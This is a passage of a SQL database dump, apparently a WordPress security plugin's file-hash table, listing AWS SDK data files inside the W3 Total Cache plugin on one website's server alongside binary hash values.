nJ\nSy','',0,'?'),('3$fo','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/data.iot/2015-05-28/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/data.iot/2015-05-28/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','< R͆xzy','Pd Hb}Dq3d','',0,'?'),('K&8?CFX?N','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/databrew/2017-07-25/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/databrew/2017-07-25/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w$Nb\Z[wI','N+0΋.#T9_2{RCҺæd','',0,'?'),('Z$%U&\rz','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/databrew/2017-07-25/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/databrew/2017-07-25/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0F K#C.F','T_NKiųq4$g(\'&]','',0,'?'),(' JŠQGCL','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dataexchange/2017-07-25/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dataexchange/2017-07-25/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7tpWe',',ōh{3}QN>FQgdvWV','',0,'?'),('T@W\0DbNEv','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dataexchange/2017-07-25/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dataexchange/2017-07-25/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZYb\0\0-c\"[\'','JR]Y\":dn=\\','',0,'?'),('e{8QBD\Z','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/datapipeline/2012-10-29/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/datapipeline/2012-10-29/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r}bfɑ^','S\'Bύ%[K@G\Zw','',0,'?'),('60S ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/datapipeline/2012-10-29/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/datapipeline/2012-10-29/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǀƚb&?nEE','iرG,U!T[!ۥ=B','',0,'?'),('\ngh!h1T','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/datasync/2018-11-09/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/datasync/2018-11-09/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڶw_auHLiK','4BO(uomS13-','',0,'?'),('B-h1D0','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/datasync/2018-11-09/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/datasync/2018-11-09/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>I|4I','5aʣM\"&?W\rL','',0,'?'),('ؐ@iL.Sq^k3','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dax/2017-04-19/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dax/2017-04-19/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'y ԭ{Dɋ','AE\0V8KZ}zi\"','',0,'?'),('y|= ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dax/2017-04-19/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dax/2017-04-19/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vĨC{>','aǕ 2Vh\'[: Lj','',0,'?'),('am>]w_u','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/detective/2018-10-26/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/detective/2018-10-26/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n{\Z[Y','yoa<3\'õsJ[$y,(','',0,'?'),('(-̻e(oǭqUve','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/detective/2018-10-26/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/detective/2018-10-26/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F,Q\nW,;^DjWTk','',0,'?'),('\0m%a?1','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/directconnect/2012-10-25/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/directconnect/2012-10-25/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?^AK4-C','ׄJ-adL|P$Pƙ f\'Xt','',0,'?'),('lej=U','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/discovery/2015-11-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/discovery/2015-11-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p+{(Ax{}y','\nzZFkŸß2k!i ܳiu','',0,'?'),('1gO=R','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/discovery/2015-11-01/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/discovery/2015-11-01/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U}zNH@j','/zcX8iFph1sf','',0,'?'),('}˞\rt^ ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dlm/2018-01-12/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dlm/2018-01-12/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؚ:a','P^RB;+&EV}]^2TM','',0,'?'),('O%O7iikF~','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dlm/2018-01-12/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dlm/2018-01-12/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X2RG|','ew[ w&v`A','',0,'?'),('&A ZlxBM','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','лb6x#Q*%K','$%63uM C<+R!y,','',0,'?'),('ai->sh\r(','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ŁB].:2bg}c','& EKSα}+89tc ','',0,'?'),('`HY!','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O)6&oʡ','3hD^`g($ssCmՏ','',0,'?'),('!4e6Hh','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dms/2016-01-01/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W;:ai','KWs[MSLv \0[\n','',0,'?'),('~$;p\\1xx','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j$/21r>VlM<','+i\n&nTSz_8)`\'m\rO','',0,'?'),('h$U5Emp','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*$\0#YfB','KD~Ay`=ZkrߙoG=','',0,'?'),('i|Qɍ 3','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Uv\'\Z~\06#','h a>p1pC?v7i\Zqp2`i~','',0,'?'),('a@̖`\'`','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/docdb/2014-10-31/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VNOs=k\n','|`*spTADZ-\0r3','',0,'?'),('3\rކ\ncfG@','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ds/2015-04-16/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ds/2015-04-16/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SƈQ.6TBGv','\nUy\ZTN[RU\'QE1Je^m','',0,'?'),('$]Oz.Y\0#','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ds/2015-04-16/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ds/2015-04-16/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>}$܌:\r',' CW\ZE.M\"D$P','',0,'?'),('CyY d=','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ds/2015-04-16/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ds/2015-04-16/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\0g\0]','*nax<[~o&I뛮7fA?x','',0,'?'),('Ϧl.9~0\'i','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7,BO?\"I','Q\0+|\0}R1fvЗ0H3OXsr','',0,'?'),('Gf!{^Āw','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J#+$ Z۽','M*#մʼeT=//b','',0,'?'),('-6$\")^','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vLc,^`','\"M6[5$3F5`d=0YUe\n','',0,'?'),('2,4EN#C','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/waiters-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CUOžyGA\r','D)ԣ(1g2x?bZ}9I\n','',0,'?'),('q0Oe)?','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2011-12-05/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3rW_pzvEU','J9K]r2<@QE)Xʵ','',0,'?'),('dEE?','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O6JOe.E#\r',',z.{iv$`㓜a!8 G+','',0,'?'),('y|TW_vmՈ ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*FI|/#L','4Jeec]ڱ jjLɇrD','',0,'?'),('U_05Ybrxï','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\nfx8/HI ','{{1R88$m','',0,'?'),(')D(֭','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/waiters-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7\\(kb vsw',',. |3Q1mAG|\')6','',0,'?'),('\Z;{ǹuE','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/dynamodb/2012-08-10/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yy_LD,δ%','Oh#/fyxRtO=G}/%&T6wsc;','',0,'?'),('DhѲ.]:','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2015-10-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2015-10-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0?b\0R)','%B`RzFRcDR=sh','',0,'?'),('}+HnVG','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2015-10-01/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2015-10-01/waiters-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S3(dAdH','__\n)?}YuX4 1D','',0,'?'),('B..~ϳ{','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2015-10-01/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2015-10-01/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T ɚ|cI} K',']@K/мm[ ge( sx(I','',0,'?'),('GjsN/w#ep','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-04-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-04-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&\\.<&v','2UixNy~UJ]#D6FFw\" ','',0,'?'),('YlSHAL','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-04-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-04-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s#|]%1','? 3u:8S]¡kzm','',0,'?'),('sGյ~G','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-04-01/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-04-01/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zй(Ӭ#','\Zҧ}t^ W=<\nf\ZvޅV','',0,'?'),('.Q.i6n.','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ט#U\ZU/KPZ','nQ˾.)(5 fFAպ5n`~','',0,'?'),('/Aɚ:','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HWɀƖ\r5','\0,m׉P\0ޖ턘Fa','',0,'?'),('|\'kPW^','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15/waiters-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wau 3d#','\nX6<x\'{ 2D(~9','',0,'?'),('& I%U','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-09-15/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','# CAXM','ƶ;A \0\"ep/6*.ݬ','',0,'?'),('f(::','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3\'IHUٺzͨ',';]u`HphC@zа','',0,'?'),('$ʩ5\"@K&We','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m i>Q-%','\"և#r!WDyK=\r','',0,'?'),(' 1\rmU','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7we(E=<','0/O)J7gPR?ӾJ','',0,'?'),('Vl_RƦk','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/waiters-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yg뇏,Vl','Rg~F@}&_0o_sO','',0,'?'),('?~^ːW_#','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2/2016-11-15/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sHѽ8 Y','Sp$A\"\0U(H `dJJ7Nx@','',0,'?'),('LAߘd*f\rn','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2-instance-connect/2018-04-02/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2-instance-connect/2018-04-02/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t~L3u1pDZ`nO','Ta线CERV4>-=bdnG','',0,'?'),('ڬ3u;eG{F\n','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2-instance-connect/2018-04-02/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ec2-instance-connect/2018-04-02/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5nq`sV[',' Eр0uNLwj݈N','',0,'?'),('ڀvc5?,','1Ug#\'d\n=j>`\Z]f%\Z1O','',0,'?'),('%mp@ɮ,nA-3o','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr/2015-09-21/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr/2015-09-21/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tufmh?m','X;M47һkЫ <&I4;1D','',0,'?'),('|{ R)E','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr-public/2020-10-30/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr-public/2020-10-30/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D_qCC%+\n','= szȎ3trPhOi','',0,'?'),('|a w܅/N82','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr-public/2020-10-30/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecr-public/2020-10-30/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uGTMl','sX]KUJksGb+`3K','',0,'?'),('m:0ߩjJ. ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecs/2014-11-13/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecs/2014-11-13/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-,G8P~\00R/','TؕfP^*!LGϧg\\>-','',0,'?'),('SFѦZ/6v','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecs/2014-11-13/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecs/2014-11-13/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')n~(<ᙫe','-&_Z}*gv|`P.c\rR','',0,'?'),('[ 恣4\'3wtXz','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecs/2014-11-13/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecs/2014-11-13/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&yk\'i\Z:5w','(0C$$>~:\rBz+~/ ','',0,'?'),('y͙/Txs:','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecs/2014-11-13/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ecs/2014-11-13/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'\Z\'pp(&\n','r1R Teo2iң!','',0,'?'),('zLYv;\np~','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eks/2017-11-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eks/2017-11-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C1`lS,Am3','zi/ƖN#@e-=m','',0,'?'),('F]Ur!%Rj x','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eks/2017-11-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eks/2017-11-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\06n${Fɽĭ','2 Dى|i 汱{O}u \\','',0,'?'),('la ЩLp','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eks/2017-11-01/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/eks/2017-11-01/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Օɭ8','mbZ$+?t Č>:%JK!K','',0,'?'),('yKR/\0','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastic-inference/2017-07-25/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastic-inference/2017-07-25/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƌ%~',' _Lt`Do:|Y\"`|@y3U','',0,'?'),('GP:G-iH','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastic-inference/2017-07-25/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elastic-inference/2017-07-25/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zBjaH/ut\0','985)!3ȯy89;2M','',0,'?'),('+&%=\'uŕRH','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticache/2015-02-02/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/elasticache/2015-02-02/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y*$1 